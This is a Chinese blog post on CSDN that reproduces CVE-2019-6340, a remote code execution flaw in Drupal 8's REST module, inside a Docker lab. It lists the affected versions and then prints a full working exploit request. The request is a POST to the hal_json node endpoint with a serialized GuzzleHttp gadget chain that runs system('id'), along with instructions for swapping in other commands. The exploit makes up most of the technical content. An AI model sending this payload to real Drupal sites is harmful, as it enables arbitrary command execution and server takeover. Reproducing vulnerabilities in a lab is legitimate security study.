Drupal 8.x 远程执行代码漏洞复现记录

最新推荐文章于 2023-12-22 17:37:44 发布
最新推荐文章于 2023-12-22 17:37:44 发布
阅读量1k 收藏
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/aliexiansheng/article/details/108123373
版权

Drupal 8.x 远程执行代码漏洞复现记录

目录

  1. 漏洞概述
  2. 漏洞影响版本
  3. 漏洞环境搭建

1.漏洞概述

Drupal官方发布安全通告称修复了一个高危的远程代码执行漏洞(CVE-2019-6340)。该漏洞源于某些字段在通过非表格(non-form resources)类型输入时未能正确过滤,导致潜在的任意PHP代码执行

2.影响版本

Drupal 8.6.x < 8.6.10
Drupal 8.5.x(或更早版本) < 8.5.11

3.环境搭建

1.使用docker可以快速搭建cve-2019-6340
在这里插入图片描述

docker search cve-2019-6340

docker search : 从Docker Hub查找镜像
2.部署环境
在这里插入图片描述拉取完成后,启动镜像。
在这里插入图片描述

docker run -d --name drupal -P knqyf263/cve-2019-6340
docker ps

根据信息连接
在这里插入图片描述

POST /node/?_format=hal_json HTTP/1.1 Host: <漏洞环境的IP:PORT> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0 Connection:  keep-alive Content-Type: application/hal+json Accept:  */* Cache-Control: no-cache Content-Length: 636

{   "link": [
    {
      "value": "link",
      "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:2:\"id\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}"
    }   ],   "_links": {
    "type": {
      "href": "<漏洞环境的IP:PORT>/rest/type/shortcut/default"
    }   } }

request和response详细信息。其中红色方框内的“id”区域为所执行的命令,数字2则是命令的长度。如果想要执行 echo 1,则前面的数字需要改成 6

sera__
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【CVE-2019-6340】Drupal 8.x REST RCE 远程执行代码漏洞
Blog of Jaoing
04-21 2784
Drupal 是由德赖斯·布伊泰尔特创立的自由开源内容管理系统,用PHP语言写成。在业界,Drupal常被视为内容管理框架(CMF),而非一般意义上的内容管理系统(CMS)。 2019-02-20,Drupal 安全团队披露了一个安全漏洞(CVE-2019-6340),如果网站开启了......
Drupalgeddon2:针对 Drupal v7.x + v8.x 的漏洞利用 (Drupalgeddon 2 CVE-2018-7600 SA-CORE-2018-002)
05-29
CVE-2018-7600 | Drupal 8.5.x < 8.5.1 / 8.4.x < 8.4.6 / 8.x < 8.3.9 / 7.x? < 7.58 / < 6.x? - 'Drupalgeddon2' RCE (SA-CORE-2018-002) ( ) 支持: Drupal < 8.3.9 / < 8.4.6 / < ...
DRUPAL 8.x远程代码执行漏洞(CVE-2018-7600)
errorr0
07-28 1583
drupal命令执行
漏洞分析】Drupal 远程代码执行(CVE-2017-6920)
蚁景网安学院
07-13 620
前几天在参加 FOFA-攻防挑战赛时,遇到了 Drupal 的盲盒漏洞环境,最终确定漏洞为 CVE-2017-6920 ,但是还是无法 getflag ,因为网上相关参考文章并不是很多,大多都只是简单的了,于是就想着对这个漏洞进行一个详细的分析......
【CVE-2018-7600】Drupal 8 远程代码执行漏洞
Mr_atopos的博客
06-07 2776
使用vulhub搭建环境使用vulhub搭建环境出了一些问题,这里直接使用BUU的环境 BUU CEV-2018-7600进去也要初始化环境,一开始语言选择英文,数据库选择SQLite 其他的可以随便设置 进入 这个漏洞可能出在填写表单的地方,该漏洞是Form API在用户提交表单数据时可以在表单渲染过程中修改表单数据想利用该漏洞,就需要在表单结构中的某个地方注入渲染数组,所以,首先要找到注入位置可以利用注册用户来进行漏洞利用先随便输入测试 通过查阅 Drupal代码和文档,可以知道,对于
Drupal 曝出代码执行高危漏洞,数百万网站受影响
weixin_33713350的博客
02-24 136
百度智能云 云生态狂欢季 热门云产品1折起>>> Drupal 开源内容管理系统曝出了一个允许黑客远...
站长们注意啦!开源CMS Drupal 8发布更新修多处高危漏洞补丁,提示您升级
weixin_34268310的博客
08-21 118
据外媒报道, Drupal 研究人员于 8 月 16 日发布安全报告,宣称已修 Drupal 8 多处漏洞并在线更新安全补丁。研究显示这些漏洞影响 Drupal 8 多个系统组件,包括实体访问系统、REST API 与部分视图组件。 CVE-2017-6925 研究人员发 Drupal 8.3.7 中存在一处高危漏洞(CVE-2017-6925),影...
drupal合同:Drupal 8.x维护和支持合同模板
02-05
本合同模板针对的是Drupal 8.x的维护和支持服务,适用于那些希望确保其基于Drupal 8.x的网站或应用能够得到持续更新、安全维护和故障解决的专业服务。 一、合同概述 Drupal 8.x维护和支持合同是客户与Drupal开发...
CMS程序Drupal 6.13-drupal6.x-codepub.zip
最新发布
03-09
这个压缩包“Drupal 6.13-drupal6.x-codepub.zip”包含了 Drupal 6.13的核心代码和其他可能的相关资源,便于用户下载、安装和使用。 1. **Drupal 6核心组件**:Drupal 6的核心包括了内容管理、用户管理、角色权限、...
Drupal Core 8 PECL YAML 反序列化任意代码执行漏洞(CVE-2017-6920)
EC_Carrot的博客
05-27 584
漏洞背景 DrupalDrupal社区所维护的一套用PHP语言开发的免费、开源的内容管理系统。 Drupal 8.0.0版本至8.3.4之前版本中存在远程代码执行漏洞,该漏洞源于PECL YAML解析器没有安全的处理PHP对象。远程攻击者可利用该漏洞在受影响应用程序上下文中执行任意代码或造成拒绝服务。 影响版本 Drupal Drupal 8.0.0 - 8.3.4 漏洞 我这里用的是vulhub的环境,需要基础配置,我这里也会放出来: #获得一个靶机的shell交互界面,CONTAINER换成自己的
Drupal 远程代码执行漏洞(CVE-2018-7602)
07-19 3098
漏洞:1.如下图所示,执行以下命令即可漏洞。示例命令为 id,如图红框中显示,可以执行该命令。 "id"为要执行的命令 第一个drupal为用户名 第二个drupal为密码 python3 drupa7-CVE-2018-7602.py -c "id" drupal drupal http://ip:8081/2.得有CVE-2018-7600的PoC。 #!/usr/bin/en...
Drupal远程代码执行(CVE-2019-6339)——Dcoker
Zlirving_的博客
06-20 523
漏洞概述 漏洞简介 Drupal core是Drupal社区所维护的一套用PHP语言开发的免费、开源的内容管理系统。 Drupal core 7.62之前的7.x版本、8.6.6之前的8.6.x版本和8.5.9之前的8.5.x版本中的内置phar stream wrapper(PHP)存在远程代码执行漏洞。 影响版本 Drupal core 7.62之前的7.x版本、8.6.6之前的8.6.x版本和8.5.9之前的8.5.x版本 危害 远程攻击者可利用该漏洞执行任意的php代码。   漏洞
漏洞分析」Drupal 远程代码执行「CVE-2017-6920」
蚁景网安学院
07-13 297
前几天在参加 FOFA-攻防挑战赛时,遇到了 Drupal 的盲盒漏洞环境,最终确定漏洞为 CVE-2017-6920 ,但是还是无法 getflag ,因为网上相关参考文章并不是很多,大多都只是简单的了,于是就想着对这个漏洞进行一个详细的分析。漏洞描述环境搭建环境的搭建,我们可以选择 p神 的 Vulhub 上的环境,我们也可以利用 vulfocus 的在线环境,或...
Drupal 远程代码执行 CVE-2019-6340 已亲自
qq_42430287的博客
12-22 828
在请求体中使用了GuzzleHttp库的FnStream类和HandlerStack类,这两个类在正常情况下是用于处理HTTP请求的,但在这里被恶意利用来执行攻击者的代码。攻击者在HandlerStack类的handler属性中插入了pbtw%%rxtx,试图输出pbtw%rxtx字符串。如果攻击成功,则响应状态码为403,响应头中将出pbtw%rxtx字样。
cve-2019-6340 drupal8 rest rce 漏洞
whatday的专栏
07-20 2947
目录 0X1 漏洞概述 0X2 环境搭建 0X3 漏洞利用 0X4漏洞分析 0X1 漏洞概述 Drupal官方之前更新了一个非常关键的安全补丁,修了因为接受的反序列化数据过滤不够严格,在开启REST的Web服务拓展模块的情况下,可能导致PHP代码执行的严重安全。 根据官方公告和自身实践,8.6.x或(<8.6.10)两种情况可能导致问题出: RESTful Web Services拓展开启,并且启用了REST资源(默认配置即可),不需要区分GET,POST等方法即可完成攻击。 .
Drupal远程命令执行漏洞
BerL1n
12-29 767
time: 2019-05-12 21:46 漏洞描述 Drupal官方发布了一个编号为CVE-2017- 6920 的漏洞,影响为Critical。这是Drupal Core的YAML解析器处理不当所导致的一个远程代码执行漏洞,影响8.x的Drupal Core。 漏洞检测 针对该漏洞,可采用两种方法进行检测: 方法一:登陆Drupal管理后台,查看内核版本是8.x,且版本号低于8.3.4,则存在该漏洞;否则,不存在该漏洞; 方法二:在Drupal根目录下找到文件/core/lib/Drupal/Com
vulfocus漏洞
08-21
除了Vulfocus漏洞之外,根据引用,Drupal曝出了一个远程代码执行漏洞(CVE-2018-7600),攻击者可以利用该漏洞执行恶意代码,导致网站完全被控制。 另外,引用提到了WordPress的远程代码执行漏洞(CVE-2016-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值